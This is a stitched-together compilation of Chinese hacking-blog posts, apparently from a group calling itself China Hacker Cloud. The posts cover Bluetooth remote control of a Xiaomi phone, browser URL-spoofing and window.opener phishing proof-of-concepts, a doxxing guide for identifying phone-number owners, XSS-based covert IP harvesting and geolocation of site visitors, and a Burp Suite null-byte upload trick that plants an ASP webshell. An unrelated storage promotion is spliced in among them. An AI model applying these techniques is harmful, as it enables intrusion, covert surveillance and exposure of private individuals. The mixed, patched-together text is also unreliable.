在弹出窗口,点击“最小功能”项,可以让小米 6功能最小化。点击“完全功能”项,表示恢复小米 6的全部功能。执行“仅关闭发送”项,可以禁止小米 6发送向外信息。执行“仅关闭接收”项,可以禁止小米接收外部信息。执行“关闭射频发射”项,可以关闭小米6的信号发射功能。在蓝牙主控面板中执行“锁定”项,可以立即锁定小米 6屏幕。在蓝牙主控面板中执行“Clip”项,可以控制小米 6是否显示来电号码。在蓝牙主控面板中执行“Clir”项,可以控制小米:6是否发送本机号码。在蓝牙主控面板中执行“操作”项,在弹出面板,可以对小米6执行自动锁键、随机更改时间、随机设置闹钟等功能。在蓝牙主控面板中执行“预设命令”项,在弹出窗口,中执行“关闭电话”项,可以远程关闭小米 6等。当然,蓝牙间谍的功能还有很多,需要我们在实际使用过程中不断体会。如何方法蓝牙间谍呢?方法很简单,如果屏幕上莫名其妙出现蓝牙标记,而自己又投有开启蓝牙功能的话,最好将其关闭。同时搜索蓝牙配对设备,发现可疑设备最好将其清除。此外,在自己没有使用手机的情况下,手机屏幕上如果莫名其妙出现各种控制信息的话,就说明很有可能是有人在远程控制您的手机,最好将蓝牙设备关闭。

中国骇客云平台近日发现两处针对大部分浏览器的欺骗漏洞0day漏洞。

主要都是针对主流浏览器的漏洞

由于部分厂商漏洞未修复,所以均采用chrome进行测试。

0x01

针对主流浏览器的网址欺诈漏洞 (1)

漏洞原理

Baloch在个人网站中说,出现漏洞的主要原因是Chrome和Android版本的Firefox浏览器对某些Unicode字符的渲染不得当。阿拉伯语和希伯来语中会有一些字符是会从右到左显示的,比如“|”。当包含这种Unicode字符的URL和IP地址合在一起时,浏览器就会把URL从右到左显示。

举个例子,某个网址逻辑上的顺序是“127.0.0.1/|/http://example.com/”,但是浏览器会在地址栏中把网址显示成“http://example.com/|/127.0.0.1”。

经过翻转的网址IP地址部分其实是很容易隐藏的,尤其是在移动设备上,只要用一个比较长的URL(google.com/fakepath/fakepath/fakepath/… /127.0.0.1)就行了。如果要想网址看起来更真实一点,还可以弄个SSL证书。

漏洞重现

Chrome

(使用了Mac端的Chrome访问PoC网站成功,iOS 手机端成功。ps:pc端,无法测试成功)

1) 访问链接http://182.176.65.7/%EF%B9%B0/http://google.com/test

2) 应该能注意到,浏览器显示的不是google的内容,但是网址却是http://google.com/test/182.176.65.7

0x02

针对大部分网站的网站欺骗漏洞 (2)

国外网友近日曝出大部分网站都忽视了的安全漏洞,包括 Facebook,Twitter,Google 等都被检测出带有 The target=”_blank” 安全缺陷。

你可以点击 http://tvvocold.coding.me/target_blank_vulnerability/ 测试这个安全问题。带有 target=”_blank” 跳转的网页拥有了浏览器 window.opener 对象赋予的对原网页的部分权限,这可能会被恶意网站利用。

<script language="javascript">window.opener.location = 'https://example.com'</script>

漏洞修复方法:为 target=”_blank” 加上 rel=”noopener noreferrer” 属性。

预计该“安全漏洞”影响了 99% 的互联网网站和大部分浏览器,Instagram 已修复这个问题,有趣的是谷歌拒绝修复这个问题,谷歌认为“这属于浏览器缺陷,不能由单一的网站进行有意义的缓解”。

这个漏洞的可能的利用场景:例如一个恶意网站在用户在 Facebook 打开其页面时,将原页面跳转到伪造的 Facebook 页面,而用户返回到原 tab 时可能会忽视浏览器 URL 已发生了变化,伪造页面即可进一步进行钓鱼或其他恶意行为…

漏洞重现

Chrome

(使用了Mac端的Chrome访问PoC网站成功。)

1)浏览器访问 poc网站:

http://tvvocold.coding.me/target_blank_vulnerability/ 发现原网址为:

别的终端未测试:(

其他浏览器以及网站也存在漏洞,但由于厂商尚未修复漏洞,因此作者还不能透露相关细节。

中国骇客云教你社工之手机信息查询新技能!

如果知道手机号码怎么查身份?大家首先想到的肯定是用搜索引擎搜一下,这里只需提醒一下大家,各种搜索引擎的算法不同,搜索结果也不尽相同,因此要尽量多用一些搜索引擎搜。

有关搜索引擎的使用丁爸公众号之前发送过多篇相关文章,关注“丁爸”公众号回复:搜索   可获取相关文章。



其次我们还可以利用手机安装的一些通讯录和安全软件来核查该手机号的用户名字。


1、电话万能钥匙

具有陌生电话号码云识别的功能,丁爸公众号回复:云识别  可获取历史相关文章

下载地址:http://www.imcaller.com/
2、腾讯手机管家

开通腾讯手机管家后手机可显示来电姓名

下载地址:http://m.qq.com/download/


3、触宝电话

也有陌生号码云识别功能

下载地址:http://www.chubao.cn/


第三,可以通过网站平台核查


4、电话邦

网址:http://www.dianhua.cn/


5、360手机卫士

网址:http://cx.shouji.360.cn/


6、搜狗号码通

http://haoma.sogou.com/rz/


7、百度号码认证

http://haoma.baidu.com/query


8、刑部11司

http://cop163.com/

9、领英

http://www.linkedin.com/

可输入姓名查询职业电话等信息

10、企查查

http://www.qichacha.com/

11、企信宝

http://www.qixin.com/


12、企业信用信息查询APP

http://www.ixy360.com/

 

13、天眼查

http://www.tianyancha.com/

 

第四、通过QQ、支付宝、微信、陌陌、易信、钉钉——–等即时通讯软件查看手机号码关联的网络ID和相关信息。


第五、查询手机注册过的网站,再通过这些网站核查注册人的身份信息。
信息图如下演示:

通过以上的连接查询手机号不错哟。
另外在本地的移动端上面输入手机号 :初始密码直接可以查询该手机号信息。
移动联通的充话费的人有时候不需要密码也是可以查询手机号密码的 你们有没有学会呢?

中国骇客云IP地理位置截取,精准度非常高!想使用的会员们可以加入我们噢 ~~

中国骇客云平台将在本平台vip客户端发布网页工具:ip地理位置获取信息。
之前有的人在做hrml5地理位置信息获取,前提必须通过手机点击允许才可以获取目标的信息,弊端:如果用户不点击允许的话是测试不到对方的真实地理位置的,那么必须得需要一些钓鱼等技术让用户点击才可以的。
第二种方法是我们骇客云出的教程使用高德地图以及百度地图谷歌地图等API接口,接入目标网站然后使用xss获取经度纬度页面信息,伪造数据,进行查看目标的真实地理位置,这样操作有点高比较麻烦。得需要自己模拟用户当时的数据。
今天我们介绍一种直接在IP真实地理位置数据库直接查询IP地理位置,根据官网的高德地图接口进行查询。
教程如下:
首先使用ip信息获取,这里官网的ip信息采集页面为:http://hackerschinaip.eu5.org/    因为之前做的aip接口和xss数据获取的,及时手机用户不点击允许都可以获取对方的IP信息。操作如下图:

这是官网的获取数据,直接查看IP就可以。
第二步:进入骇客云平台。
点击开始,打开菜单的应用库,搜索:hackerip地理位置 找到该应用,如下图:

然后点击安装,安装完毕以后。
打开,搜索获取到的IP地址:如下图所示:
查看到的ip地址最后一个是非常精准的,今天我们获取的IP地理位置应该是我们官微上用户的真实地理位置。他当时触发的是官网的xss获取ip、
最后官网的高德应用中查看最后的信息:如下图:

我用的QQ截图,可能上传到官网的时候会出现模糊的现象,不过咱们官网的用户可以亲自去测试。
最后说明一下:该ip数据库的地理位置非常准确。
如果不准确可以进行报错,第二我们并没有申请该站的api接口,嵌入式开发,所以在应用上还得需要手动去看。第三,该应用是有弊端的,经过测试:对于机房服务器的ip地址,使用流量手机的Ip地址,不准确。连入内网的wifi手机ip,办公内网,家庭公网准确率在85%,所以请大家在测试的时候看一下最后数据是否显示街区,如果显示说明成功率已经在85%精确度大概在1到2公里左右。
分界线。
获取目标Ip的方法:
可以自己写xss获取方法,详情查询我们的历史文章。
可以使用网页插件监控的方法。
可以使用qq显ip、
可以用软件查看对方Ip。、
方法很多:百度一下吧。
我们官网用的是:官网页面采集,xss页面采集,官网游客监控采集。
大家也可以使用一些网站统计的代码直接可以获取当时用户访问的Ip地址后台就可以查询的。教程到此结束!感谢支持。

400m数据存储空间如何利用拿…中国骇客云平台技术教程

最近中国首创线下实体+线上网络进行服装批发、分销的平台一乐淘库与国内知名硬盘空间提供商一永硕E盘(YS168)正式达成战略合作关系。乐淘库与永硕将在产品、存储、广告方面进行全方位战略合作,通过双方强势平台之间的密切互动,为广大乐淘库商户提供精心整合的互联网服务。

QV1PY6]J[SDK(7P5XV}{[UG.jpg

数据包存储空间注册指南:

一:乐淘库商户登录后,点击后台的“淘宝数据包”菜单。

二:在打开的页面中,点击“数据包存储空间”。

三:填写相关信息,注意“档口号”中一定要填写正确的档口号,在此页面输入的档口号和密码为ys168存储空间的帐号和密码,请妥为保管。

四:生成数据包存储空间地址

五:点击进去数据包空间,可以在左侧的管理区输入刚才设置的帐号和密码,对空间进行管理。

ok,中国骇客云给大家带来的福利怎样,这样我们就可以使用这400M的存储空间了!

中国骇客云之Burp suite网站攻击利器快速处理上传截断

Burp suite是一个安全测试框架,它整合了很多的安全工具,对于渗透的朋友来说,是不可多得的一款囊中工具包,今天笔者带领大家来解读如何通过该工具迅速处理“截断上传”的漏洞。如果对该漏洞还不熟悉,就该多去网上学习下。

由于该工具是通过Java写的,所以需要安装JDK,关于JDK的安装,笔者简单介绍下。基本是傻瓜化安装,安装完成后需要简单配置下环境变量,右键”我的电脑”->”属性”一>”高级”一>”环境变量”,在系统变量中查找Path,然后点击编辑,把JDK的bin目录写在path的最后即可。

通过CMD执行下javac看是否成功安装。安装配置成功则会显示下图信息。

这里的测试网址是笔者帮朋友测试某站点时获取的,登陆后台后可以发表新闻,但是只能上传图片,然后发现新闻的图片目录在upload/newsimg下。

后台有个”网站资料设置”的功能,可以自行定义新闻图片的路径,但是当尝试把新闻图片路径改为“upload/newsimg.asp/”时,上传图片竟然上传失败了,所以这种方法失效。

接下来我们尝试上传截断漏洞,可能大家经常用的是通过WSockExpert抓包,修改后通过nc来提交获取shell,但是大家会发现那样有点繁琐,我们看看今天的方法是多么高效!

QQ截图20170314135253.png

首先运行Burp suite允许burpsuite.jar,然后点击“proxy”标签,会发现burp suite默认的代理监听端口为8080,如果怕跟自己电脑上的某个端口冲突的话,可以点击“edit”进行编辑。笔者使用默认端口。

然后打开本地浏览器的代理设置的地方,IE一般为“工具”->“Internet选项”->“连接”->“局域网设置”,其他浏览器大致相同。

设置代理之后,我们到后台的某个上传新闻图片的地方上传一个图片木马,我这里的图片木马为asp一句话。

点击上传之后,我们到proxy的“history”选项,会发现该(本文来自危险漫步博客)网站的某个POST提交请求,我们选中该链接后,右键选择“send to repeater”。

我们会发现刚才提交的请求的数据包,那么我们看一下,有一项是上传路径的地方,我们以前进行截断上传的时候经常修改这个地方,这次也不例外,我们把上传路径改为”upload/shell.asp”后面有一个空格。

然后选择”hex”进入16进制编辑模块,将空格的16进制20改为00,即null。

然后点击上方的“go”即可进行数据包的提交,提交成功后会返回提交的路径,笔者通过菜刀就直接连接到一句话后门了。大家进行测试吧!